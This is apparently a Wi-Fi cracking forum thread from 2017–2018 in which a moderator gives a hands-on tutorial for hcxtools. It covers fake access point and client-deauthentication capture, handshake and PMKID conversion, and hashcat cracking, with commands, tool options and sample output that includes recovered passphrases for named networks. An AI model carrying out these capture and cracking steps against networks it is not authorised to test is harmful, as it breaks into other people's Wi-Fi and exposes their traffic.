NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - AP-less attack with hcxtools


45 Results - Page 1 of 2 -
1 2
Author Message
Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Sun, 12 Nov 2017 @ 10:18:36

Hcxtools is a complete suite of tools to capture and convert packets from possible WiFi devices. Its a command line tool, developed for UNIX users. It doesn't work on MS Windows machines. With these tools we are able to capture 4-ways handshakes, analyze captured cap, hccpax files, convert cap, hccap files to hccapx or John the Ripper format and reverse, strips BSSID, ESSID, OUI,MESSAGE PAIR, etc. We can generate possible password candidates. It has a built-in "whoismac" function to show vendor information.

What are hcxtools: hcxtools are able to get the handshakes (capture only M1-M2,) without Access Points (AP) using client's probe requests. Once a client successfully connected to an AP earlier, its saved this AP's name -SSID to his cache) and than we can find the password using hashcat. Many users thinking the old aircrack way and look for a beacon and a proberesponse from the AP. That is not neccessary, because proberequest, (re)association request, (re)association response and the M2 contains every information we need.

Important info again: M2 contains every information we need!

Also, hcxtools are able to capture and save possible plainmasterkeys (PMK) from wlantraffic (hashcat mode: 2501).
We can attack and crack the last part of a WPA ENTERPRISE authentication. Hcxtools can capture half or incomplete "passwords" from which we can calculate the right password.

Example: user typed first 8 digits of his password, but real password is 16 digits

We got 10 handshakes from the client, but only one is crackable using 8 digits If we know that the default keyspace for this router is 16 digit, we can try:
12345678?d?d?d?d?d?d?d?d
and are able to crack the remaining 9 handshakes.

Supported hashcat hash-modes: 2500, 2501, 4800, 5500, 12000.
Source: https://github.com/ZerBea/hcxtools

Background:
In normal situation the wifi clients (supplicants) try to discover the network by scanning all possible channels & listening to beacons (passive scanning) in order to find a known network (SSID). However it is not considered to be very efficient. There is another way to enhance this discovery process, supplicants often use an active scanning. In active scanning, supplicants still go through each channel in turn, but instead of passively listening to the signals on that frequency, station send different kinds of Probe Request management frames asking what network is available on that channel. Once a Probe sent, supplicant starts a ProbeTimer countdown & wait for answers. At the end of the timer, supplicant process the answer it has received. If no answers received, supplicant moves to next channel & repeats the discovery process. Supplicants sending Probe Request may specify the SSID they looking (directed probe request). Then only IBSS STA or AP support that SSID will answer. The SSID value can also be set to 0 (i.e. SSID field is present, but empty). This is called Wildcard SSID or Null Probe Request.

Undirected Probe Request frame to a single AP:
ff:ff:ff:ff:ff:ff from 11:22:33:44:55:66 SSID: Networkname

Undirected Probe Request frame to all APs:
ff:ff:ff:ff:ff:ff from 11:22:33:44:55:66 SSID: Broadcast

Directed Probe Request frame to a single AP:
aa:bb:cc:dd:ee:ff from 11:22:33:44:55:66 SSID: Networkname

Directed Probe Request frame to a single AP:
aa:bb:cc:dd:ee:ff from 11:22:33:44:55:66 SSID: Broadcast

With hcxtool - answering every probe requests - a client will try to connect to us. In that situation we are the access point. We need to get the M2 from the client (as it contains every information we need).

The authentication process workflow in normal case:
- the client sends a probe request
- the AP responds sending a probe response
- the clients sends an authentication request
- the AP responds to the authentication request
- the client sends an association request
- the AP acknowledges and sends an authentication response followed by the M1
- the client acknowledges and sends the M2
- if the M2 is ok, the ap acknowledges and sends the M3 (that means the client is authenticated)
- if the M3 is ok the client acknowledges and sends the M4 (that means the Ap is authenticated)
from this point the data transfer can begin

In our case: client wants to connect to fake AP (hcxtools - wlandump-ng)
- wlandump-ng - Station: send associationrequest
- wlandump-ng - Station: send acknowledge (client knows that the AP received his packets)
- wlandump-ng - Station: send M1
- wlandump-ng - Station: send acknowledge (AP knows that the client received his packets)
- wlandump-ng - Station: send M2
- wlandump-ng - Station: send acknowledge (AP knows that the client received his packets)

So we can capture M1/M2, it is unauthenticated, but crackable.

Note: This AP-less attack is outdated on latest devices, as they are running countermeasures against fake AP's. Development of a new updated wlandump-ng is on process (attack against this kind of authentication).

Step by step tutorial:

1. put our wireless-card into monitor mode (in our case wlan1) and stop wpa-supplicant.service, network-manager.service

Note:
we have to identify all services that takes access to your capture device and stop them.

2. capture handshakes: wlandump-ng -i $WLANDEV -o $ARCHIVNAME.cap-c 1 -t 4 -E 4 -d -D -R -U -B -s

Note: There are 3 different mode with wlandump-ng. Active scanning and Passive scanning.

Active scanning: wlandump-ng attacks everything - deauthentication/disassociation stops when 4 complete handshakes retrieved.
Command: wlandump-ng -i wlan1 -o ARCHIVNAME.cap -c 1 -t 4 -E 4 -D -d -R -U -B -s

Passive scanning: Passive mode is for situations, where it isn't allowed to transmit.It is like airodump-ng. We can use this mode for surveillance to get new clients. No emissions going out. No neighbours are disturbed.
Command: wlandump-ng -i $WLANDEV -o $ARCHIVNAME.cap -c 1 -t 120 -R -B -s

Mobile mode: wlandump-ng -i $WLANDEV -o $ARCHIVNAME.cap -c 1 -t 4 -D -d -E 2 -R -U -B -s

to finish capturing press CTRL+C.

3. analyze captured handhakes : wlancapinfo -i $ARCHIVNAME.cap or wlanhcxinfo -i $ARCHIVNAME.hccapx

4. convert captured handshake to hashcat format: wlancap2hccx -o $ARCHIVNAME.hccapx -e testlist -f pmklist -u username_list -S hashinfo $ARCHIVNAME.cap

Note:
-e option save possible captured passwords, SSIDs
-f option save captured PMKs
-u option save captured usernames (in case of WPA ENTERPRISE Authentication)
-s option save hashinfo

5. analyze hccpax file: wlanhcxinfo -i $ARCHIVNAME.hccapx

Note: I suggest to use for more detailed information: wlanhcxinfo -i $ARCHIVNAME.hccapx -a -s -e -p -R -M

6. sort and uniq testlist: sort -u testlist >testlist_sorted

7. run hashcat with mode 2500:
- first test captured testlist - hashcat attack mode 0 or 3
- second use wpa-dictionary with rules or masks

Note: if wlanhcxinfo show that "hashcat --nonce-error-corrections is working on that file", we should use this options with hashcat for better hit performance.

8. run hashcat with mode 2501 to test captured PMKs.

9. put our wireless-card back back managed mode and start again the stopped services, in our case wpa-supplicant.service, network-manager.service

hcxtools contain wlancapinfo/wlanhcxinfo to analyze captured handshakes:
let's analyse the hccapx: wlanhcxinfo -i 2238_1507453996.hccapx

total hashes read from file.......: 5
wlandump-ng forced handshakes.....: 0
zeroed ESSID......................: 0
802.1x Version 2001...............: 5
802.1x Version 2004...............: 0
WPA1 RC4 Cipher, HMAC-MD5.........: 0
WPA2 AES Cipher, HMAC-SHA1........: 5
WPA2 AES Cipher, AES-128-CMAC.....: 0
Group keys........................: 0
message pair M12E2................: 2 (0 not replaycount checked)
message pair M14E4................: 0 (0 not replaycount checked)
message pair M32E2................: 3 (0 not replaycount checked)
message pair M32E3................: 0 (0 not replaycount checked)
message pair M34E3................: 0 (0 not replaycount checked)
message pair M34E4................: 0 (0 not replaycount checked)
hashcat --nonce-error-corrections is working on that file

we have 2 not authenticated handshakes and 3 authenticated handshakes

Let's take a look at the anonces (wlanhcxinfo shows that nonce correction is possible):
wlanhcxinfo -i 2238_1507453996.hccapx -a -A

bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881=
bd62
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881=
bd63
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881=
bd63
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881=
bd64
bc7574c9d730:bf45c5b013df8891ba34345daca63d14136d06424188e0f7883e25293881=
bd64

take a look at the last byte: If we choose a nonce-error-correction =2 we can use every combination and have a valid message_pair.

We can do: wlanhcx2ssid -i 2238_1507453996.hccapx -N valid1.hccapx

Note:
(-N option means: output stripped file (only one record each mac_ap, mac_sta, essid, message_pair combination)

Now we have only 2 records (one each connected client). Running hashcat with nonce-error-corrections 2 on them gave me:

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: /home/user/WLAN/Hash/valid1.hccapx
Time.Started.....: Sun Oct 8 15:45:51 2017 (0 secs)
Time.Estimated...: Sun Oct 8 15:45:51 2017 (0 secs)
Guess.Base.......: File (/home/user/WLAN/Passwortlisten/WPA_list)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 484.9 kH/s (2.56ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 85744/85744 (100.00%)
Rejected.........: 152/85744 (0.18%)
Restore.Point....: 0/85744 (0.00%)
Candidates.#1....: !5urlaub26! -> =D0=BD=D0=B0=D0=B9=D0=B4=D0=B5=D0=BD
HWMon.Dev.#1.....: Temp: 44c Fan: 33% Util: 62% Core:1835MHz Mem:5005MHz =
Bus:16

and the key is:
60c0b1cb2a9fbe3bde6c466414d47160:bc7574c9d730:2c8a725b0da6:Telekom-K3VGCK:57680186
9da67d738d869721cfe72aec48c681ae:bc7574c9d730:2c8a725b0da6:Telekom-K3VGCK:57680186

Possible output logs:
- found Fast BSS transition (fast roaming) - we can attack the client with CRACK
- found WDS or Mesh packets - detected WDS/Mesh packet. Information only.
- found WPS Authencation - not imlemented yet. Information only.

More detailed information can be found on hashcat forum hcxtools - solution for capturing wlan traffic and conversion to hashcat formats or on github

Thank you ZerBea for contributing to the writing of this post and for developed this great tool.



If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
jimbas

Status: Trusted
Joined: Sat, 26 Mar 2016
Posts: 830
Team:
Reputation: 1357 Reputation
Offline
Mon, 13 Nov 2017 @ 16:18:13

+1!
very nice explanation!!


BTC: 3F78Wk7GhnWAzAsrUw6uUeXZ3PzyuAvkm7
BCH: 33tuLY5u8drRkgP4pVeFupPrV8bSV5xaqY

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Tue, 21 Nov 2017 @ 20:40:07

Upcoming versions of the 3rd. generation hcxtools - status "testing": https://github.com/ZerBea/hcxtoolsbleeding

The authentication engine was completely rewritten and some options changed, removed.

The new authentication sequence can be read here, because of HTML code not allowed.

command line options:
-i interface: interface
-o dump file: output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-c digit: set channel (default = channel 1)
-2: scan 2.4 GHz channels (default scan off) 1, 3, 5, 7, 9, 11, 6, 2, 4, 12, 8, 10, 13,
-5: scan 5 GHz channels (default scan off) 36, 40, 44, 48, 52, 56, 60, 64, 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 149, 153, 157, 161, 165
-t seconds: stay time on channel before hopping to the next channel (default = 5 seconds)
-B file: blacklist (do not deauthenticate clients from this hosts - format: xxxxxxxxxxxx)
-I: show suitable wlan interfaces and quit
-T maxerrors: terminate after xx maximal errors (default: 1000)
-P: enable poweroff
-s: enable status messages
-h: show this help
-v: show version

Forum: https://hashcat.net/forum/thread-6661-post-37629.html#pid37629


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Wed, 22 Nov 2017 @ 13:36:07

If you have free time please test the hcxtoolsbleeding with your Clients or Access Points.

You should retrieve M2's from all KRACK fixed ANROID devices.
Post the test results here, please.
Thank you very much for your contribution.

How to check for immunity against attack: krackattacks-scripts can be found here: https://github.com/vanhoefm/krackattacks-scripts

Note:
These scripts are not attack scripts! You require network credentials in order to test
if an access point or client is affected by the attack.


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Tue, 19 Dec 2017 @ 22:09:06

UPDATE!
hcxtools moved to v 4.0.1 (https://github.com/ZerBea/hcxtools):
added wlandump-rs
- use raw sockets instead of libpcap
- faster and more aggressive than wlandump-ng
- able to capture more handchakes than wlandump-ng
- automatic use channel 14 and 5GHz channels if driver supports this
- improvements on scan engine
- improvements on authentication engine
- use ap blacklist instead of BPF

$ wlandump-rs -h
wlandump-rs 4.0.1 (C) 2017 ZeroBeat
usage: wlandump-rs options

options:
-i interface : interface
-o dump file : output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)
-c digit : set channel (default = channel 1)
-t seconds : stay time on channel before hopping to the next channel
: default = 5 seconds
-B file : blacklist (do not deauthenticate clients from this hosts - format: xxxxxxxxxxxx)
-I : show suitable wlan interfaces and quit
-T maxerrors : terminate after xx maximal errors
: default: 1000000
-D : enable to transmit deauthentication- and disassociation-frames
-P : enable poweroff
-s : enable status messages
-h : show this help
-v : show version


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
PixL

Status: n/a
Joined: Fri, 14 Apr 2017
Posts: 112
Team:
Reputation: 10 Reputation
Offline
Sat, 23 Dec 2017 @ 07:24:27

Any chance of these working on OpenWRT instead of a Pi?


BTC: 13kXxHdNutoykbg66c3vb8MwGuLkNGjfAC

1 x GTX 1050

Avatar
PixL

Status: n/a
Joined: Fri, 14 Apr 2017
Posts: 112
Team:
Reputation: 10 Reputation
Offline
Sat, 23 Dec 2017 @ 08:06:15

To install these tools on Kali Linux you will want to do the following first...

sudo su
apt-get install libpcap-dev
apt-get install libcurl4-openssl-dev
make
make install


BTC: 13kXxHdNutoykbg66c3vb8MwGuLkNGjfAC

1 x GTX 1050

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Sat, 23 Dec 2017 @ 13:27:40

PixL said:

Any chance of these working on OpenWRT instead of a Pi?

For your information:

"Any chance of these working on OpenWRT instead of a Pi?
Not yet, there are some big endian problems and some other problems.
Some musl fixes are done, but still a long way to go :)"


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Thu, 22 Feb 2018 @ 07:00:35

UPDATE!

17.02.2018
==========
hcxpcaptool
added nonce fuzzing logic for john and old hashcat (hccap) according to bitmask:
0: MP info
1: MP info
2: MP inf
3: x (unused)
4: ap-less attack (set to 1) - no nonce-error-corrections neccessary
5: LE router detected (set to 1) - nonce-error-corrections only for LE neccessary
6: BE router detected (set to 1) - nonce-error-corrections only for BE neccessary
7: not replaycount checked (set to 1) - replaycount not checked, nonce-error-corrections definitely neccessary

15.02.2018
==========
hcxpcaptool
added detection of router endianess and ap-less attacks:
bitmask for message_pair file:
0: MP info
1: MP info
2: MP inf
3: x (unused)
4: ap-less attack (set to 1) - no nonce-error-corrections neccessary
5: LE router detected (set to 1) - nonce-error-corrections only for LE neccessary
6: BE router detected (set to 1) - nonce-error-corrections only for BE neccessary
7: not replaycount checked (set to 1) - replaycount not checked, nonce-error-corrections definitely neccessary

using bit 4 to 7, hcxtools are able to interact with hascat - that will increase speed for hashcat.



If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
PixL

Status: n/a
Joined: Fri, 14 Apr 2017
Posts: 112
Team:
Reputation: 10 Reputation
Offline
Thu, 22 Feb 2018 @ 18:25:29

I really like these tools and wlandump-ng is VERY effective....however what are the benefits between wlandump-ng and hcxdumptool?


BTC: 13kXxHdNutoykbg66c3vb8MwGuLkNGjfAC

1 x GTX 1050

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Tue, 05 Jun 2018 @ 10:56:13

hcxpcaptool for detection an attack on a IEEE 802.11 network system.


Usage:
hcxpcaptool options
hcxpcaptool options [input.pcap] [input.pcap] ...
hcxpcaptool options *.cap
hcxpcaptool options *.*

Options:
-o file : output hccapx file (hashcat -m 2500/2501)
-O file : output raw hccapx file (hashcat -m 2500/2501)
-x file : output hccap file (hashcat -m 2500)
-X file : output raw hccap file (hashcat -m 2500)
-j file : output john WPAPSK-PMK file (john wpapsk-opencl)
-J file : output raw john WPAPSK-PMK file (john wpapsk-opencl)
-E file : output wordlist (autohex enabled) to use as input wordlist for cracker
-I file : output unsorted identity list
-U file : output unsorted username list
-P file : output possible WPA/WPA2 plainmasterkey list
-T file : output management traffic information list
: european date : timestamp : mac_sta : mac_ap : essid
-H file : output dump raw packets in hex
-V : verbose (but slow) status output
-h : show this help
-v : show version

--time-error-corrections=digit : maximum allowed time gap (default: 600s)
--nonce-error-corrections=digit : maximum allowed nonce gap (default: 8)
: should be the same value as in hashcat
--netntlm-out=file : output netNTLMv1 file (hashcat -m 5500, john netntlm)
--md5-out=file : output MD5 challenge file (hashcat -m 4800)
--md5-john-out=file : output MD5 challenge file (john chap)
--tacacsplus-out=file : output TACACS+ authentication file (hashcat -m 16100, john tacacs-plus)

bitmask for message:
0001 M1
0010 M2
0100 M3
1000 M4

Attention!
Do not use hcxpcaptool in combination with third party cap/pcap/pcapng cleaning tools!

time-error-corrections=digit Use the same values as in hashcat or JtR.
That means, if you convert the cap to hccapx using --nonce-error-corrections=128
you must(!) use the same value in hashcat.

nonce-error-corrections=digit the maximum allowed timegap between 2 messages within the authentication.

In case of have bad reception, use higher values for both options!
hcxpcaptool doesn't correct the nonce.
Using --nonce-error-corrections reduces the overhead, because only handshakes up to this value
are converted. If you decide to convert up to a value of 256 you will get more handshakes (on crappy reception),
but you need also the same value in hashcat to recover the password from them.

Example:
hcxpcaptool -O hcxdump.hccapx -E wordlist.txt -U usernamelist.txt -T traffixlist.txt -I identitylist.txt -P pmklist *.cap

"O" option is useful, converting (raw) all handshakes

- to get more PSKs (with nonce-error-correction and time-error-correction it could find more crackable handshakes (~20% more)).
- to detect online attacks against a network or
- to detect typos of the user or
- incomplete PSKs

hcxpcaptool for detection of an attack against a WiFi-network:

Probes to connect to an AP with a wrong PSK, hcxtools/hcxdumtool will capture this
handshakes, too. Hashcat is able to crack them, but it will give the wrong PSK for that network.

Note: The first field is very important for hashcat.
It is a special internal md5_64 checksum to make the hash unique.Hashcat and hcxtools use this checksum.
This dupes aren't detected between hashcat pre 4.x!

In this case hashcat output looks like (MAC addresses have been modified):

00017f2c088aa76f5c0eee87edf53ce6:9094e43323xx:00738d3fa8xx:sokol:stargate
005a43cb4d97e60c78098d7495aa5028:9094e43323xx:00738d3fa8xx:sokol:maverick
00cf0ca8e9de91523589e297b3a9c156:9094e43323xx:00738d3fa8xx:sokol:rush2112
00e44e97faf8b748aa62fae668f208a5:9094e43323xx:00738d3fa8xx:sokol:asdfasdf
0119561c9feffd1d919c32c9b38a1153:9094e43323xx:00738d3fa8xx:sokol:nicholas
015c16ac09de92418e4849bec41be1a8:9094e43323xx:00738d3fa8xx:sokol:garfield
02c92644089cec030434fac3c1617346:9094e43323xx:00738d3fa8xx:sokol:benjamin
040892cc069a18a2d2dc7a4e6e13efb7:9094e43323xx:00738d3fa8xx:sokol:softball
046facc9e0385c37908f204b2717a974:9094e43323xx:00738d3fa8xx:sokol:kawasaki
04862a351f5b6cbc7c01224ed6dbd10d:9094e43323xx:00738d3fa8xx:sokol:november
0494cc2cfdb4972e8bac5c97815625b3:9094e43323xx:00738d3fa8xx:sokol:1q2w3e4r
049b7427dced2370d56358967353f5cb:9094e43323xx:00738d3fa8xx:sokol:freepass
04afe254cb28c3e34ae35cd85ccebf9f:9094e43323xx:00738d3fa8xx:sokol:qwertyui
0547a8647b4369fc6aac895a2a09e77b:9094e43323xx:00738d3fa8xx:sokol:princess
0552a540524e38664c83077285a3df4c:9094e43323xx:00738d3fa8xx:sokol:steelers
05cf886cb6b8906f0b2159dbaa9a4b49:9094e43323xx:00738d3fa8xx:sokol:westside
05e7f572e62540db96b05daaf5b6f1b2:9094e43323xx:00738d3fa8xx:sokol:rolltide
061c9d44ebab61a8e163faae7f924c6e:9094e43323xx:00738d3fa8xx:sokol:williams
0625cda16779725d619c595069949473:9094e43323xx:00738d3fa8xx:sokol:airborne
0658e898e84434075838c610f79ff77c:9094e43323xx:00738d3fa8xx:sokol:peekaboo
0672af23d54b824dd13569ad9cebf86d:9094e43323xx:00738d3fa8xx:sokol:metallic


Hcxpcaptool for detection of typos of the user, stored in the STA's wpa_supplicant.conf on a wifi network system:
(To improve security of the STA, it's important to remove this entries from the STA wpa_supplicant.conf!)


2269d11a79e9c426bd949ded737cc712:0004edfa94xx:54e43acfc4xx:DewDrop:11111111
00ee1f16bfbb791e0ccaf092b4c30389:0004edfa94xx:54e43acfc4xx:DewDrop:12345678
00876ac1efb086f64846196aa0718033:0004edfa94xx:54e43acfc4xx:DewDrop:aaaaaaaa


Incomplete PSKs:


90647c4a916cbd903020d292419bd182:000c533deexx:d85b2acef6xx:FRITZ!Box Gastzugang:12345678
071dc32276e1cb7fe7eaa0808e38a6e2:000c533deexx:ec59e7f46dxx:FRITZ!Box Gastzugang:11223456789#
8fe545e117cdbef43da486f5499fec10:14cc205964xx:78929c5af7xx:leningrib:gribgrib
b74c4e2f34040334f47b46ae3f6423a9:14cc205964xx:78929c5af7xx:leningrib:gribgribgribgrib



If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Wed, 06 Jun 2018 @ 07:51:59

This is another nice example from ZerBea:

413c454695dc49ab612f2ec76ed51ec6:708bcd31caXX:1caba7a283XX:ASUS:mannaburger58
b8f00d319695be543306f04927d528af:708bcd31caXX:64eb8c0016XX:ASUS:MANNABURGER58

One of the clients tries to connect with activated numlock of his keyboard


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Fri, 22 Jun 2018 @ 14:47:55

hcxtools has been updated: Added full support for TaZmen Sniffer Protocol (TZSP)


$ hcxpcaptool -V tzsp.pcap
start reading from tzsp.pcap

summary:
--------
file name....................: tzsp.pcap
file type....................: pcap 2.4
network type.................: DLT_EN10MB (1)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 15
skipped packets..............: 0
packets with FCS.............: 0
WDS packets..................: 15
EAPOL packets................: 15
IPv4 packets.................: 15
UDP packets..................: 15
TZSP (802.11) packets........: 15

Background: TaZmen Sniffer Protocol (TZSP) is an encapsulation protocol used to wrap other protocols. It is commonly used to wrap 802.11 wireless packets to support Intrusion Detection Systems (IDS), wireless tracking, or other wireless applications.

Source: https://wikivisually.com/wiki/TZSP
and here:
https://github.com/hashcat/hashcat-utils/pull/45


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Tue, 10 Jul 2018 @ 22:19:22

hcxtools has been updated: https://hashcat.net/forum/thread-6661-post-41092.html#pid41092

hcxpcaptool: added detection of FILS authentication

$ hcxpcaptool -V -I identitylist *.pcapng
start reading from fils-handshake.pcapng
summary:
file name....................: fils-handshake.pcapng
file type....................: pcapng 1.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 92
skipped packets..............: 0
packets with FCS.............: 0
beacons......................: 25
probe responses..............: 2
association requests.........: 2
association responses........: 2
authentications (OPEN SYSTEM): 2
authentications (FILS).......: 2
deauthentications............: 5
action packets...............: 5
EAPOL packets................: 4
EAP packets..................: 6
found........................: EAP type ID
found........................: EAP-PSK Authentication

Get example cap from here:
https://github.com/vanhoefm/wifi-example...ake.pcapng

Retrieved identity is in identitylist.

hcxpcaptool: added detection of BROADCOM specific authentication

BROADCOM adds a special vendor tag to the authentication sequence:
Tagged parameters (11 bytes)
Tag: Vendor Specific: Broadcom
Tag Number: Vendor Specific (221)
Tag length: 9
OUI: 00:10:18 (Broadcom)
Vendor Specific OUI Type: 2
Vendor Specific Data: 0202000c0000

From now on, hcxdumptool and hcxpcaptool are able to capture and detect this:
$ hcxpcaptool -V broadcomtag.pcap
start reading from broadcomtag.pcap
summary:
file name....................: broadcomtag.pcap
file type....................: pcap 2.4
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 2
skipped packets..............: 0
packets with FCS.............: 0
authentications (OPEN SYSTEM): 2
authentications (BROADCOM)...: 1

hcxpcaptool: added detection of SONOS specific authentication

SONOS adds a special vendor tag to the authentication sequence, too:
Tagged parameters (8 bytes)
Tag: Vendor Specific: Sonos, Inc.
Tag Number: Vendor Specific (221)
Tag length: 6
OUI: 00:0e:58 (Sonos, Inc.)
Vendor Specific OUI Type: 2
Vendor Specific Data: 020101

From now on, hcxdumptool and hcxpcaptool are able to capture and detect this:

$ hcxpcaptool -V sonostag.pcap
start reading from sonostag.pcap
summary:
file name....................: sonostag.pcap
file type....................: pcap 2.4
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1
skipped packets..............: 0
packets with FCS.............: 0
authentications (OPEN SYSTEM): 1
authentications (SONOS)......: 1

hcxpcaptool: added detection of SONOS and APPLE specific authentication.

SONOS adds a special vendor tag to the authentication sequence, too:
Tagged parameters (8 bytes)
Tag: Vendor Specific: Sonos, Inc.
Tag Number: Vendor Specific (221)
Tag length: 6
OUI: 00:0e:58 (Sonos, Inc.)
Vendor Specific OUI Type: 2
Vendor Specific Data: 020101

APPLE adds a special vendor tag to the authentication sequence, too:
Tagged parameters (13 bytes)
Tag: Vendor Specific: Apple, Inc.
Tag Number: Vendor Specific (221)
Tag length: 11
OUI: 00:17:f2 (Apple, Inc.)
Vendor Specific OUI Type: 10
Vendor Specific Data: 0a00010400000000


From now on, hcxdumptool and hcxpcaptool are able to capture and detect this:
$ hcxpcaptool -V tags.pcap
start reading from tags.pcap
summary:
file name....................: tags.pcap
file type....................: pcap 2.4
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 4
skipped packets..............: 0
packets with FCS.............: 0
authentications (OPEN SYSTEM): 4
authentications (SONOS)......: 1
authentications (APPLE)......: 3


That are really nice fingerprints!


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Wed, 25 Jul 2018 @ 20:04:50

hcxdumptool and hcxtools: moved to v 4.2.0 rc1
Added complete new WPA attackmode according to new hashcat hashmodes 16800 and 16801.

Changelog:

25.07.2018
==========
hcxtools moved to 4.2.0 rc1
hcxpcaptool:
added hashmodes -m 16800 and -m 16801
and new options:
-z file : output PMKID file (hashcat hashmode -m 16800 - WPA*-PMKID-PBKDF2)
-Z file : output PMKID file (hashcat hashmode -m 16801 - WPA*-PMKID-PMK)
use hcxpcaptool as dumper/attacker, convert with hcxpcaptool, retrieve PSK using hashcat

removed wlandump-ng (old scool, deprecated)
removed wlancap2hcx (old scool, deprecated)

Advantage:
only 2 packets required
1 associationrequest/reassociationrequest (proberesponse is ok, too)
2 EAPOL 1/4 (M1) with included RSN IE

Remember ap-less attack:
only 2 packets required
1 associationrequest/reassociationrequest (proberequest is ok, too)
2 EAPOL 2/4 (M2) as response to hcxdumptool

Just use hcxdumptool to capture, hcxpcaptool to convert and hashcat to crack

hcxtools update: 4.2.0 rc1
added new attack mode on WPA PMKID

$ hcxpcaptool -z hashfile.16800 pmkidassociationrequest.pcapng
start reading from pmkidassociationrequest.pcapng
summary:
file name....................: pmkidassociationrequest.pcapng
file type....................: pcapng 1.0
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 3
skipped packets..............: 0
packets with FCS.............: 0
association requests.........: 1
association responses........: 1
EAPOL packets................: 1
EAPOL PMKIDs.................: 1

1 PMKID(s) written to hashfile.16800

$ hashcat -m 16800 hashfile.16800 wordlist

Source: https://hashcat.net/forum/thread-6661-post-41220.html#pid41220


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Thu, 26 Jul 2018 @ 09:13:11

In connection with hashcat mode 16800.

"The tools are 100% compatible to hashcat and John the Ripper and recommended by hashcat. This branch is pretty closely synced to hashcat git branch (that means: latest hcxtools matching on latest hashcat beta)."

It works with the latest hashcat git.


If I helped a +rep is appreciated!

: 13hDMK85KhVnPb2eTFBacHD6kDjKYFLudb
XMPP: freeroute@xmpp.jp

Avatar
PixL

Status: n/a
Joined: Fri, 14 Apr 2017
Posts: 112
Team:
Reputation: 10 Reputation
Offline
Fri, 27 Jul 2018 @ 14:53:36

Please can you build hcxdumptool for OpenWRT/Lede? It would work so well on a WiFi Pineapple!


BTC: 13kXxHdNutoykbg66c3vb8MwGuLkNGjfAC

1 x GTX 1050

Avatar
freeroute
Moderator
Status: Trusted
Joined: Sat, 16 Jul 2016
Posts: 2325
Team:
Reputation: 7872 Reputation
Online
Sat, 04 Aug 2018 @ 18:14:25

